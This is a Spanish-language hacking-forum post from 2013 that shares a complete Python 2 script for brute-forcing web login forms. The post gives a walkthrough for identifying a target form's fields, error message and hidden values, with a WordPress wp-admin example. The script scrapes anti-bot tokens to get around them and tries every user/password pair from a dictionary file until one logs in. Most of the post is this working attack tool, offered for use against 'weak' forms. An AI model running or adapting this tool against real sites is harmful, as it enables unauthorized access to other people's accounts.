elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Código-Python]Bruteforce logins - JaAViEr (0000x5d)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Código-Python]Bruteforce logins - JaAViEr (0000x5d)  (Leído 1,899 veces)
0x5d

Desconectado Desconectado

Mensajes: 241



Ver Perfil WWW
[Código-Python]Bruteforce logins - JaAViEr (0000x5d)
« en: 20 Marzo 2013, 21:31 pm »

¡ Hola, buen día !

  Hace meses que no programaba, entre viajes, no había donde ni como programar... Y hoy por la mañana me entusiasmé y me puse a codear un BruteForce para algunos formularios que son "débiles". El funcionamiento es el típico ... Solo que tiene algo que lo hace un poco (por no decir "NADA") diferente. Le añadí la opción de extraer tokens que usualmente utilizan para seguridad anti-bots (lo que deja demostrado que siguen siendo inútiles los tokens :P). Sin más preámbulos, os enseñaré como utilizarlo .

Al correr el Python en cuestión , nos dirá "Se necesita token ?(s/n): "
Si el formulario que ustedes van a atacar, funciona con el sistemita ese de los tokens, entonces denle "s" o "S" y enter ... De ser así, os pedirá el nombre del campo del token que se envía , para así el programa buscarlo y poder enviarlo en cada petición...

De lo contrario, simplemente pongan n o N y al siguiente paso...

El siguiente es el vital y el que nos permitirá saber cuando nuestro login es válido ... Mensaje de error .

¿ Cómo saber dicho mensaje ?

Van al formulario, ingresan un usuario y contraseña incorrectos. Les devolverá algo tipo : "Credenciales inválidas", "Usuario o contraseña incorrectos", "Error al ingresar", ETC

Entonces nosotros tomamos una palabrita de ellas, "Error" o "incorrectos" o el que les salga a ustedes. Este mensaje es el que nos ayudará a ver que nuestro usuario & contraseña funcionen.

Posteriormente, el programa nos dirá "Campo user: " , que es el nombre del Input que envía el formulario , por ejemplo <input type="text" name="user"> , entonces ingresan "user".

Luego, "Campo password: ". Vamos al source y buscamos el type="password" , miramos su propiedad name (por ejemplo <input type="password" name="clave"> e ingresamos "clave" en el programa.

Seguido de eso, nos pedirá un "Archivo(Diccionario): " Que es con el diccionario que atacaremos el formulario, ahí ingresas la ruta de vuestro diccionario.

Y como ultima cosa, nos preguntará ... Campos adicionales ?(s/n)

Por si envía algún dato en hidden el formulario. La manera de insertar el campo es la siguiente:
NAME VALUE
Código:
Data:redirect_to /wp-admin
Data:remember_me 1
Que sería el equivalente a
Código
  1. <input type="hidden" name="redirect_to" value="/wp-admin">
  2. <input type="hidden" name="remember_me" value="1">
Luego dirá "Data:" y para correr el bruteforce, tipeamos "//brute" y paff , buscará el login correcto.
Código
  1. # Autor   : 0x5d || JaAViEr
  2. # Twitter : @0x5D
  3.  
  4. import urllib
  5. import sys
  6. import re
  7. import urllib2
  8.  
  9. class brute:
  10.  
  11. def __init__(self):
  12.  
  13.  
  14. self.nombre_token = ""
  15. self.valor_token = ""
  16. self.actualizar_formulario = ""
  17. global formulario
  18. formulario = {}
  19. self.buscar_hash = raw_input("Se necesita token ?(s/n): ")  
  20. self.buscar_hash = True if self.buscar_hash.lower() == "s" else False
  21. self.url_form = "" # URL donde se encuentra el formulario
  22. if self.buscar_hash:
  23. if self.extraer_token():
  24. print "Token FOUND"
  25. else:
  26. print "Token Not Found :( "
  27. self.url_to_post = "" # URL donde se envia el formulario
  28. self.mensaje_error = raw_input("Mensaje de Error: ") # Mensaje de error, para detectar un login correcto
  29. self.campo_usuario = raw_input("Campo user: ") # Nombre del campo (input) del usuario
  30. self.campo_password = raw_input("Campo password: ") # Nombre del campo (input) del password
  31. self.archivo_diccionario = raw_input("Archivo(Diccionario): ") # Archivo con Diccionario
  32. self.datos_adicionales = raw_input("Campos adicionales? (s/n): ")
  33. self.respuesta_adicionales = True if self.datos_adicionales.lower() == "s" else False
  34. self.estado_token = True
  35. if self.respuesta_adicionales:
  36. self.agregar_campos()
  37. self.bruteforce()
  38.  
  39. def agregar_campos(self):
  40. formulario = {}
  41. while self.respuesta_adicionales:
  42. data = raw_input('Data: ')
  43. parse_data = data.split(" ")
  44. if data != "//brute":
  45. formulario.update({parse_data[0]:parse_data[1]})
  46. print formulario
  47. else:
  48. break
  49.  
  50. def extraer_token(self):
  51.  
  52. estado_token = True
  53. if len(self.nombre_token)<=0:
  54. self.nombre_token = raw_input("Nombre del token: ")
  55. while estado_token:
  56. try:
  57. buscar = urllib2.urlopen(self.url_form)
  58. if self.nombre_token in buscar.read():
  59.  
  60. estado_token = False
  61. buscar_token = urllib2.urlopen(self.url_form)
  62. found = re.findall("name=\"%s\" (.*)"%self.nombre_token, buscar_token.read())
  63. if len(found)>0:
  64.  
  65. for i in range(len(found)):
  66.  
  67. if "value=\"" in found[i]:
  68. self.split_token = re.findall("value=\"(.*)\"", found[i])
  69. self.valor_token = self.split_token[0]
  70. return True
  71. else:
  72. return False
  73. else:
  74. return False
  75. else:
  76. return False
  77. except:
  78. return False
  79.  
  80. def bruteforce(self):
  81. cookie = urllib2.HTTPCookieProcessor()
  82. opener = urllib2.build_opener(cookie)
  83. urllib2.install_opener(opener)
  84. estado_archivo = True
  85. while estado_archivo:
  86. try:
  87. cargar_diccionario = open(self.archivo_diccionario, "r")
  88. separar_datos = cargar_diccionario.read().split("\n")
  89. estado_archivo = False
  90. except:
  91. print "No se encuentra el archivo mencionado"
  92. self.archivo_diccionario = raw_input("Archivo(Diccionario): ")
  93. print "Buscando el login correcto ..."
  94. for users in separar_datos:
  95.  
  96. for passwords in separar_datos:
  97.  
  98. if self.buscar_hash:
  99. datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords, self.nombre_token:self.valor_token})
  100. else:
  101. datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords})
  102.  
  103. enviar_formulario = urllib2.urlopen(self.url_to_post, urllib.urlencode(formulario))
  104. if self.mensaje_error in enviar_formulario.read():
  105. print ".",
  106. else:
  107. print "\nFound User:%s - Password:%s"%(users, passwords)
  108. sys.exit(1)
  109. cargar_diccionario.close()
  110.  
  111. bf = brute()
  112.  
Le faltan mil cosas por pulir ... Luego lo pasaré para que lea parámetros por ARGV .

Para ingresar la URL del formulario deben editar la línea :
Código
  1. self.url_form = "" # URL DEL FORMULARIO
  2. self.url_to_post = "" # URL DONDE SE ENVIA EL FORM
  3.  
Ojo, que a veces el formulario envía el POST al mismo archivo, pero no siempre ! .
Pido el URL del formulario para poder extraer los tokens previo envío , posteriormente, envío todos los datos a la URL que procesa los datos ;D

Espero sea de su agrado.

Fuente : http://www.vodale.com/blog

Saludos, Javier.


« Última modificación: 30 Marzo 2013, 02:21 am por 0x5d » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines